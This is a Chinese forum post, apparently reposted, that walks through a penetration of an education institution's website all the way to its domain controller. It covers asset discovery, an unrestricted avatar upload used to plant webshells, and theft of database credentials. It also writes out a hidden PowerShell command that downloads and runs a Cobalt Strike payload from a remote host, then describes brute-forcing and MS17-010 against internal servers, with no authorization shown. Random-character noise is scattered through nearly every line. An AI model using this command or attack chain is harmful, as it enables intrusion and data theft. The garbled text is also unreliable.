中国网络渗透测试联盟

标题: 渗透实战 | 从外网直接打到内网全过程 [打印本页]

作者: admin    时间: 2024-3-1 19:41
标题: 渗透实战 | 从外网直接打到内网全过程

1 p* Z j7 e# X 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路6 k; d9 }7 _* D

5 L& y( x3 h- }7 g* I; O1 ?) Z

) ?( K5 ~5 K2 O  1 [8 K. m) L9 W- A$ [

3 m# G' T. N# h& E; p

( {( v0 N6 G9 O! H& O u 正文/ r0 r2 i+ M: [; p

, d. Z* W6 P8 X- g

/ j: }+ n+ P2 a( P  " w7 j0 a: j3 H0 |/ O

( k- p. O; q1 t1 E( q/ X

2 O7 H* q0 R5 `; z7 h* } 目标:www.xxxx.com(一家教育机构)
5 e! S- D \) [5 g: d& Y
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
# `' y& V7 I8 s( O

$ M. q. g% f! S$ o

$ v/ @( r L$ m' H/ | vshapes=2 p$ Q9 u* }1 h. J, E' H6 M3 r

, m- W$ @ e/ s! g; f

" M& W: @1 J5 J/ \: h% D 进行了简单的信息搜集
7 T8 L* e/ B$ F& f/ K' P
. u, t/ y3 l1 C6 P
2 }5 s: g9 v ~- v/ E' i

/ H, G9 g" @/ c2 j3 ^! K5 z8 G

( e1 {' m# J% V4 A. F3 Z8 f 子域名搜集 5 N1 J! e" D) i) F$ o& Z( r

( G/ y0 k) d% m: `' @* p, {. D

2 P6 F: i0 \7 z. d2 L9 p: v' a vshapes= 9 y# \" {$ o8 G2 h0 j* F; b& k( p

9 q$ O& H. Z" E @/ a( g1 o% G3 @5 _

( w5 Z) }, G2 z( W9 h0 ^) R fofa找资产
2 x! |$ k* |+ D+ g2 f3 X5 p' z
+ E& T4 ]: i+ ~4 n
c4 x, ^2 G. m( e

# w: ~# I4 A' ~' }6 X

9 i4 A; _( _2 G$ a. {& a6 A7 y( V vshapes=, }( |/ F* b2 w* s m: i+ s

: o# M/ M" H% A; ~: W

, p4 ?" Z$ n1 Y: d# [+ P0 G" { [ 一共七个资产。去重之后只有两个。
! i+ V" {6 z& b# ^( ^
+ H+ e* g- D3 L" K* h9 r8 M2 A4 l
7 z; ?/ Y; D7 p: t# B+ G" X

& W, ^9 j0 D' A+ k! n8 o1 ]1 C2 `

* E1 C4 j7 D+ f9 U7 X$ F1 ^, J+ B+ s 目录探测 # R' m& ~4 m% r7 h L. Y

5 b* Q; |4 ], \4 J

# c/ k( z5 V3 M1 N: k vshapes= . g/ @" S& ]) b% g% K. u

% V# l+ K" J1 i9 {( x4 W6 f

0 }9 x# S D9 u% s 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
' V5 V2 ?; b9 h$ X0 z& |
+ u+ Y: v: b( ]9 l
3 }& R9 d0 Y; b4 Q& p' E$ r

* p5 P" Q) |2 S0 e

/ }& D! r; D- ~% `) L4 t 我又尝试了通过修改返回包来绕过登录界面 ! N# ]0 d; d5 I

& r- L/ [0 E: m) y9 u7 O$ H

! H) T, r- q o8 }' l9 n vshapes= $ ~$ O, r; v- H* J5 v: h5 W% B- K

% o( h1 F) d/ c2 T3 M4 \

6 h0 [9 N" Y5 [7 O 还是不行,尝试注入无果5 q. O3 n- w" M! k) Z

8 Y: Y8 x) b b" w

* ^( n) h0 ^" F' [! O vshapes= K+ T* C0 K. W) ?. |7 ^, G$ `. G

0 t6 ~' ?9 h6 _1 a( @2 E' o

. G; S. z! Q2 } 不过我目录探测出了一处Spring信息泄露
* z& ~6 x0 c& g! U9 _, u
8 ^% i! d2 c, c$ m. A
6 \. @5 O" a; \* e% |, ~

9 ^5 @. `6 S9 F- R8 |. {% O; |

9 B, q, m0 I! U% ~" P" j vshapes= - P, r4 V2 T9 A1 p4 r9 Q. o" d

7 p+ }, _9 ]2 K% j5 j+ Z# X+ Z, o

3 f/ K2 H9 g: r0 i9 b) G G1 L 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录, ~7 c5 T6 C* ?# { _

6 I% T4 l9 \- A2 e

& r3 i5 X! z# P' S1 Q2 }3 r' p, e vshapes=) F [+ i; K; U# S

4 ?. k2 \0 R/ L

# G) }# B, O* j* F7 p7 O( U 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 3 Z/ K; k% s) F

* h% N3 h7 H/ {0 X0 K: |

% R" t0 N- q) J2 C vshapes=5 M' T" Q0 e' e& w/ c9 N$ I; N+ S

. q5 l) v0 ?! [2 b5 X' J% U T

' \3 B% i' S5 ?- o* B) p* C 获取有些师傅到这一步就手机抓包电脑测了。 [# Q9 t* `& j8 X

5 f9 X4 C# `- h4 c* R

% K- M% K9 M1 ]- e4 Y1 k8 r Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 % h$ Z( ? B# J

4 U% @; c' B9 w

3 r& C+ p" a8 k- ]+ ?7 d 其中在一个公众号发现了小程序,可以进行注册。7 D" }8 b5 c$ R; G% `9 X

+ a2 G% m0 h5 W3 c

% _- w/ R2 I# C. A ` 看到了头像上传,尝试上传获取WebShell9 W1 r% q: K' Z1 y, I( a

* G" c7 z8 E: |- S

* C ^* m" t+ H5 x vshapes=' N2 b U( N( r. ]* V- x( R9 ~7 H. N" D

& w, x+ B3 O5 S

2 X5 V! n" C: J9 p' E- c9 u" v 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 - a6 ~% E# j3 ?/ t0 T3 ?$ V6 ~

7 G. Y+ ^7 A- e+ q2 Q

|' w9 v/ U8 Y7 X4 @5 O# v vshapes=* @$ S. k( h: I4 L* f

* A, n$ Y: @" ]/ u) k- W" f

. c9 D D& j' M6 O% v 然后上了大马/ V* |" x1 s( N* S& v6 |' W) B, a

, h) l9 b p% I- @4 r4 \

i5 [; @/ r D# m2 t vshapes= 4 s. {3 l; U) ] t& j

" E) V+ @/ O( h1 x% o

1 F$ P# k7 J; |8 I vshapes=; k) h2 m1 q& W5 Q! p/ f& @

. }1 y3 G% W% J) Q$ {: E3 q/ x9 X

6 T! x( n w8 ?. c* L4 j 通过翻找文件发现数据库账号密码; ]3 B' |+ E' e' B1 Z9 R; O

% K3 ?) `: q* g1 V* a

4 h) T2 ~: @" l$ |8 L U vshapes=& ]" [/ C" ^% |* D- O

5 \9 `7 x0 w& U+ Y, F5 n% ^! T

4 o* X5 {0 J; N0 ]1 c3 j --内网渗透 * |6 A+ N* {& t2 X

, Z( A2 J/ U" x2 e" w- F5 ?* N

$ Z+ J R# F9 p9 r w 直接通过powershell执行 cs上线 ' e, Z1 a! u3 e8 Y2 ]9 I

/ W3 F3 ^ F5 p" H. {! D

# ^* ^/ d- l/ u* F- M$ L powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" 1 \' i4 k) t6 r( j# l& Y

% s( F9 L( r) v! N1 H) m" r$ ` H

. ]4 C2 s% y8 l* c- X# Y% X, d1 [7 }& \ vshapes= & ]* X$ g- }) J0 Z

6 U* n; s+ i* A" v3 c; ^6 N

1 s0 d/ A1 O! I" T 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破9 ~5 {* U2 J- @ k8 ]9 C/ v

! p% {5 o& ~9 c5 o

6 w% t! O! v* H$ ?1 |1 ? vshapes= % g) C6 W: ^; \8 e

; O3 r' z8 B3 P. z8 S* B# |

: t* M/ A/ n# B# f 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
! A1 T/ c3 P% s
( H K' g2 r* @: o5 G; p& P0 X! C
% q: W- P' h" ]
0 F& @! t1 F. L: [$ S# }2 Z

! T Y: A- c. {4 {- m$ n

& K. z! u; e) r9 |, S* ^9 O vshapes= 5 ~% R+ B- Q8 }7 O

* h. k% |- ?4 o/ T' ~

$ x0 V8 |6 Q, a 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
: k3 l1 q: ]5 z6 ^* H
3 l! P# s/ c) T7 {" P$ U: m, J+ g
: U8 a; B0 }/ g! G. X. F9 [

( P7 _4 [" f, {& i+ k3 f

) \4 `8 \8 o% h vshapes= 5 S# v7 Z8 W; o% g+ W6 k/ b

: C8 i M9 N3 S4 S7 p5 f: f

3 d0 [/ |+ V1 j' J
$ B$ k- i0 {* K! q3 }
- {8 I2 b- [0 N: ?& }
( A0 f& z6 K% N% e) T( ?; P

& }7 y8 @2 z3 N4 x3 M

1 c/ D$ f; R1 r3 |" [, `% R   . H/ Y$ e9 h/ g

K. [, y! B8 j/ U

# V: @5 D8 |3 h4 V! N 小结 - w6 n- g B- S3 i3 Y' x# i h

8 r4 y- c9 s- r& w6 y7 U

1 d4 D. K1 W& w. d1 w   / p* a4 [+ v$ I: y7 E2 {# Q

' L" n; ` k4 Z# n

, Q* u4 ]6 [. g4 w% B; T4 q/ Y 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!7 q7 W" c: N" q1 J

; v: \) i2 R) P3 [9 N2 L5 r# R2 `5 X

( s$ }) a3 F, P* T! J  / I: g( y& L9 F5 t6 v9 g9 B

4 f8 g! }$ @# O ! k) {- J9 {) u* X2 G* r

8 e( I! V3 s- b2 y* ]1 s$ F 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html 7 s7 I& m& Q. g; d* T

$ E5 ]/ e# p1 j0 W

- R6 I- X4 k) y   * _2 \* H1 _& m






欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2